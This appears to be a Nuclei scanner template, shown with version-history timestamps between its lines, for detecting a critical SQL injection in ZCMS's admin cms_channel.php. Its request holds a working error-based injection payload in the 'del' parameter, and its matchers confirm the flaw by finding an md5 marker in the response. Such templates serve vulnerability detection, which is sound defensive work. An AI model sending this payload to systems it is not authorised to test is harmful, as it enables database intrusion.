2021-04-23 13:18:00 +00:00
id : zcms-v3-sqli
2022-04-22 10:38:41 +00:00
2021-04-23 13:18:00 +00:00
info :
2022-09-29 13:38:41 +00:00
name : ZCMS - SQL Injection
2021-04-23 13:18:00 +00:00
author : princechaddha
2022-09-29 13:38:41 +00:00
severity : critical
description : ZCMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2022-04-22 10:38:41 +00:00
reference :
- https://www.anquanke.com/post/id/183241
2022-09-29 13:38:41 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 10.0
cwe-id : CWE-89
2021-04-23 13:18:00 +00:00
tags : zcms,sqli
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-04-23 13:18:00 +00:00
2022-06-30 03:20:00 +00:00
variables :
num : "999999999"
2023-04-27 04:28:59 +00:00
http :
2021-04-23 13:18:00 +00:00
- method : GET
path :
2022-06-30 03:20:00 +00:00
- "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5({{num}})%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'"
2021-04-23 13:18:00 +00:00
matchers-condition : and
matchers :
- type : word
words :
2022-06-30 03:20:00 +00:00
- '{{md5({{num}})}}'
2021-04-23 13:18:00 +00:00
part : body
2022-06-30 03:20:00 +00:00
- type : status
status :
- 200